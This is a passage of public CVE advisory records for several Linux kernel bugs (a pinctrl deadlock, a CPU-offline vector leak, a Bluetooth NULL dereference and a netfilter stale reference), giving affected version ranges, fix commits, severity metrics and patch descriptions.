"lessThan": "b36efd2e3e22a329444b6b24fa48df6d20ae66e6",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
},
{
"lessThan": "4038c57bf61631219b31f1bd6e92106ec7f084dc",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
},
{
"lessThan": "48a7a7c9571c3e62f17012dd7f2063e926179ddd",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
},
{
"lessThan": "adec57ff8e66aee632f3dd1f93787c13d112b7a1",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/pinctrl/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.10"
},
{
"lessThan": "3.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER\n\nIn create_pinctrl(), pinctrl_maps_mutex is acquired before calling\nadd_setting(). If add_setting() returns -EPROBE_DEFER, create_pinctrl()\ncalls pinctrl_free(). However, pinctrl_free() attempts to acquire\npinctrl_maps_mutex, which is already held by create_pinctrl(), leading to\na potential deadlock.\n\nThis patch resolves the issue by releasing pinctrl_maps_mutex before\ncalling pinctrl_free(), preventing the deadlock.\n\nThis bug was discovered and resolved using Coverity Static Analysis\nSecurity Testing (SAST) by Synopsys, Inc."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:46.924Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e65a0dc2e85efb28e182aca50218e8a056d0ce04"
},
{
"url": "https://git.kernel.org/stable/c/420ce1261907e5dbeda1e4daffd5b6c76f8188c0"
},
{
"url": "https://git.kernel.org/stable/c/b813e3fd102a959c5b208ed68afe27e0137a561b"
},
{
"url": "https://git.kernel.org/stable/c/01fe2f885f7813f8aed5d3704b384a97b1116a9e"
},
{
"url": "https://git.kernel.org/stable/c/b36efd2e3e22a329444b6b24fa48df6d20ae66e6"
},
{
"url": "https://git.kernel.org/stable/c/4038c57bf61631219b31f1bd6e92106ec7f084dc"
},
{
"url": "https://git.kernel.org/stable/c/48a7a7c9571c3e62f17012dd7f2063e926179ddd"
},
{
"url": "https://git.kernel.org/stable/c/adec57ff8e66aee632f3dd1f93787c13d112b7a1"
}
],
"title": "pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42090",
"datePublished": "2024-07-29T16:26:30.139Z",
"dateReserved": "2024-07-29T15:50:41.172Z",
"dateUpdated": "2025-05-04T09:22:46.924Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-31076 (GCVE-0-2024-31076)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
genirq/cpuhotplug, x86/vector: Prevent vector leak during CPU offline
The absence of IRQD_MOVE_PCNTXT prevents immediate effectiveness of
interrupt affinity reconfiguration via procfs. Instead, the change is
deferred until the next instance of the interrupt being triggered on the
original CPU.
When the interrupt next triggers on the original CPU, the new affinity is
enforced within __irq_move_irq(). A vector is allocated from the new CPU,
but the old vector on the original CPU remains and is not immediately
reclaimed. Instead, apicd->move_in_progress is flagged, and the reclaiming
process is delayed until the next trigger of the interrupt on the new CPU.
Upon the subsequent triggering of the interrupt on the new CPU,
irq_complete_move() adds a task to the old CPU's vector_cleanup list if it
remains online. Subsequently, the timer on the old CPU iterates over its
vector_cleanup list, reclaiming old vectors.
However, a rare scenario arises if the old CPU is outgoing before the
interrupt triggers again on the new CPU.
In that case irq_force_complete_move() is not invoked on the outgoing CPU
to reclaim the old apicd->prev_vector because the interrupt isn't currently
affine to the outgoing CPU, and irq_needs_fixup() returns false. Even
though __vector_schedule_cleanup() is later called on the new CPU, it
doesn't reclaim apicd->prev_vector; instead, it simply resets both
apicd->move_in_progress and apicd->prev_vector to 0.
As a result, the vector remains unreclaimed in vector_matrix, leading to a
CPU vector leak.
To address this issue, move the invocation of irq_force_complete_move()
before the irq_needs_fixup() call to reclaim apicd->prev_vector, if the
interrupt is currently or used to be affine to the outgoing CPU.
Additionally, reclaim the vector in __vector_schedule_cleanup() as well,
following a warning message, although theoretically it should never see
apicd->move_in_progress with apicd->prev_cpu pointing to an offline CPU.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b Version: f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T01:46:03.929Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a40209d355afe4ed6d533507838c9e5cd70a76d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f5f4675960609d8c5ee95f027fbf6ce380f98372"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6752dfcfff3ac3e16625ebd3f0ad9630900e7e76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9eeda3e0071a329af1eba15f4e57dc39576bb420"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e9c96d01d520498b169ce734a8ad1142bef86a30"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/59f86a2908380d09cdc726461c0fbb8d8579c99f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ebfb16fc057a016abb46a9720a54abf0d4f6abe1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6c11c0a5235fb144a65e0cb2ffd360ddc1f6c32"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-31076",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:53.896904Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:46.615Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/kernel/apic/vector.c",
"kernel/irq/cpuhotplug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a40209d355afe4ed6d533507838c9e5cd70a76d8",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "f5f4675960609d8c5ee95f027fbf6ce380f98372",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "6752dfcfff3ac3e16625ebd3f0ad9630900e7e76",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "9eeda3e0071a329af1eba15f4e57dc39576bb420",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "e9c96d01d520498b169ce734a8ad1142bef86a30",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "59f86a2908380d09cdc726461c0fbb8d8579c99f",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "ebfb16fc057a016abb46a9720a54abf0d4f6abe1",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
},
{
"lessThan": "a6c11c0a5235fb144a65e0cb2ffd360ddc1f6c32",
"status": "affected",
"version": "f0383c24b4855f6a4b5a358c7b2d2c16e0437e9b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/kernel/apic/vector.c",
"kernel/irq/cpuhotplug.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.13"
},
{
"lessThan": "4.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngenirq/cpuhotplug, x86/vector: Prevent vector leak during CPU offline\n\nThe absence of IRQD_MOVE_PCNTXT prevents immediate effectiveness of\ninterrupt affinity reconfiguration via procfs. Instead, the change is\ndeferred until the next instance of the interrupt being triggered on the\noriginal CPU.\n\nWhen the interrupt next triggers on the original CPU, the new affinity is\nenforced within __irq_move_irq(). A vector is allocated from the new CPU,\nbut the old vector on the original CPU remains and is not immediately\nreclaimed. Instead, apicd-\u003emove_in_progress is flagged, and the reclaiming\nprocess is delayed until the next trigger of the interrupt on the new CPU.\n\nUpon the subsequent triggering of the interrupt on the new CPU,\nirq_complete_move() adds a task to the old CPU\u0027s vector_cleanup list if it\nremains online. Subsequently, the timer on the old CPU iterates over its\nvector_cleanup list, reclaiming old vectors.\n\nHowever, a rare scenario arises if the old CPU is outgoing before the\ninterrupt triggers again on the new CPU.\n\nIn that case irq_force_complete_move() is not invoked on the outgoing CPU\nto reclaim the old apicd-\u003eprev_vector because the interrupt isn\u0027t currently\naffine to the outgoing CPU, and irq_needs_fixup() returns false. Even\nthough __vector_schedule_cleanup() is later called on the new CPU, it\ndoesn\u0027t reclaim apicd-\u003eprev_vector; instead, it simply resets both\napicd-\u003emove_in_progress and apicd-\u003eprev_vector to 0.\n\nAs a result, the vector remains unreclaimed in vector_matrix, leading to a\nCPU vector leak.\n\nTo address this issue, move the invocation of irq_force_complete_move()\nbefore the irq_needs_fixup() call to reclaim apicd-\u003eprev_vector, if the\ninterrupt is currently or used to be affine to the outgoing CPU.\n\nAdditionally, reclaim the vector in __vector_schedule_cleanup() as well,\nfollowing a warning message, although theoretically it should never see\napicd-\u003emove_in_progress with apicd-\u003eprev_cpu pointing to an offline CPU."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:07.572Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a40209d355afe4ed6d533507838c9e5cd70a76d8"
},
{
"url": "https://git.kernel.org/stable/c/f5f4675960609d8c5ee95f027fbf6ce380f98372"
},
{
"url": "https://git.kernel.org/stable/c/6752dfcfff3ac3e16625ebd3f0ad9630900e7e76"
},
{
"url": "https://git.kernel.org/stable/c/9eeda3e0071a329af1eba15f4e57dc39576bb420"
},
{
"url": "https://git.kernel.org/stable/c/e9c96d01d520498b169ce734a8ad1142bef86a30"
},
{
"url": "https://git.kernel.org/stable/c/59f86a2908380d09cdc726461c0fbb8d8579c99f"
},
{
"url": "https://git.kernel.org/stable/c/ebfb16fc057a016abb46a9720a54abf0d4f6abe1"
},
{
"url": "https://git.kernel.org/stable/c/a6c11c0a5235fb144a65e0cb2ffd360ddc1f6c32"
}
],
"title": "genirq/cpuhotplug, x86/vector: Prevent vector leak during CPU offline",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-31076",
"datePublished": "2024-06-21T10:18:04.335Z",
"dateReserved": "2024-06-21T10:13:16.276Z",
"dateUpdated": "2025-05-04T09:05:07.572Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43884 (GCVE-0-2024-43884)
Vulnerability from cvelistv5
Published
2024-08-26 07:11
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: MGMT: Add error handling to pair_device()
hci_conn_params_add() never checks for a NULL value and could lead to a NULL
pointer dereference causing a crash.
Fixed by adding error handling in the function.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 Version: 5157b8a503fa834e8569c7fed06981e3d3d53db0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43884",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:11.783444Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:09.088Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/mgmt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "11b4b0e63f2621b33b2e107407a7d67a65994ca1",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
},
{
"lessThan": "90e1ff1c15e5a8f3023ca8266e3a85869ed03ee9",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
},
{
"lessThan": "9df9783bd85610d3d6e126a1aca221531f6f6dcb",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
},
{
"lessThan": "951d6cb5eaac5130d076c728f2a6db420621afdb",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
},
{
"lessThan": "5da2884292329bc9be32a7778e0e119f06abe503",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
},
{
"lessThan": "064dd929c76532359d2905d90a7c12348043cfd4",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
},
{
"lessThan": "ee0799103b1ae4bcfd80dc11a15df085f6ee1b61",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
},
{
"lessThan": "538fd3921afac97158d4177139a0ad39f056dbb2",
"status": "affected",
"version": "5157b8a503fa834e8569c7fed06981e3d3d53db0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/mgmt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.3"
},
{
"lessThan": "4.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.321",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.283",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.225",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.166",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.107",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.48",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.321",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.283",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.225",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.166",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.107",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.48",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.7",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: Add error handling to pair_device()\n\nhci_conn_params_add() never checks for a NULL value and could lead to a NULL\npointer dereference causing a crash.\n\nFixed by adding error handling in the function."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:32.272Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/11b4b0e63f2621b33b2e107407a7d67a65994ca1"
},
{
"url": "https://git.kernel.org/stable/c/90e1ff1c15e5a8f3023ca8266e3a85869ed03ee9"
},
{
"url": "https://git.kernel.org/stable/c/9df9783bd85610d3d6e126a1aca221531f6f6dcb"
},
{
"url": "https://git.kernel.org/stable/c/951d6cb5eaac5130d076c728f2a6db420621afdb"
},
{
"url": "https://git.kernel.org/stable/c/5da2884292329bc9be32a7778e0e119f06abe503"
},
{
"url": "https://git.kernel.org/stable/c/064dd929c76532359d2905d90a7c12348043cfd4"
},
{
"url": "https://git.kernel.org/stable/c/ee0799103b1ae4bcfd80dc11a15df085f6ee1b61"
},
{
"url": "https://git.kernel.org/stable/c/538fd3921afac97158d4177139a0ad39f056dbb2"
}
],
"title": "Bluetooth: MGMT: Add error handling to pair_device()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43884",
"datePublished": "2024-08-26T07:11:58.043Z",
"dateReserved": "2024-08-17T09:11:59.288Z",
"dateUpdated": "2025-05-04T09:28:32.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26808 (GCVE-0-2024-26808)
Vulnerability from cvelistv5
Published
2024-04-04 09:50
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechain
Remove netdevice from inet/ingress basechain in case NETDEV_UNREGISTER
event is reported, otherwise a stale reference to netdevice remains in
the hook list.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad Version: 60a3815da702fd9e4759945f26cce5c47d3967ad |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.575Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9489e214ea8f2a90345516016aa51f2db3a8cc2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70f17b48c86622217a58d5099d29242fc9adac58"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af149a46890e8285d1618bd68b8d159bdb87fdb3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e5888acbf1a3d8d021990ce6c6061fd5b2bb21b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36a0a80f32209238469deb481967d777a3d539ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01acb2e8666a6529697141a6017edbf206921913"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26808",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-27T19:35:33.665875Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-27T19:36:03.888Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_chain_filter.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9489e214ea8f2a90345516016aa51f2db3a8cc2f",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
"versionType": "git"
},
{
"lessThan": "70f17b48c86622217a58d5099d29242fc9adac58",
"status": "affected",
"version": "60a3815da702fd9e4759945f26cce5c47d3967ad",
